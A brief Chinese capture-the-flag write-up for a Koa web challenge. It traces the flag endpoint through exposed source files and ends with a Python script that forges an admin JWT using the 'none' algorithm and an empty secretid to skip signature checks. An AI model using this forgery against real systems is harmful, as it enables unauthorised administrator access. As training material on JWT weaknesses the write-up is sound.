查看页面源代码,发现app.js中显示,访问/api/flag,如果成功,则把flag的值以username的形式返回出来
发现koa-static是在构建Web应用时,提供静态资源(如HTML、CSS和JavaScript文件)是必不可少的一部分。 Koa-static正是为此目的而设计的,它是一个简洁且强大的Koa框架静态文件服务中间件,使得处理静态文件变得轻而易举。
可以看到controllers 是项目控制器目录接受请求处理逻辑的,访问一下controllers/api.js
Jwt的格式为前两段是base64,第三部分加密方式为第一部分声明的加密算法结合密匙进行加密,解密地址:JSON Web Tokens - jwt.io
import jwt #需要下载,pip3 install PyJWT
token = jwt.encode(
{
"secretid": [], #让"secretid"为空,他的加密算法就为空,所以那个加密就废了,也算是绕过jwt的一种方式
"username": "admin", #伪造对象
"password": "123",
"iat": 1726371956 #对应自己解码出来的iat
},
algorithm = "none", key="")
print(token)
利用脚本生成的jwt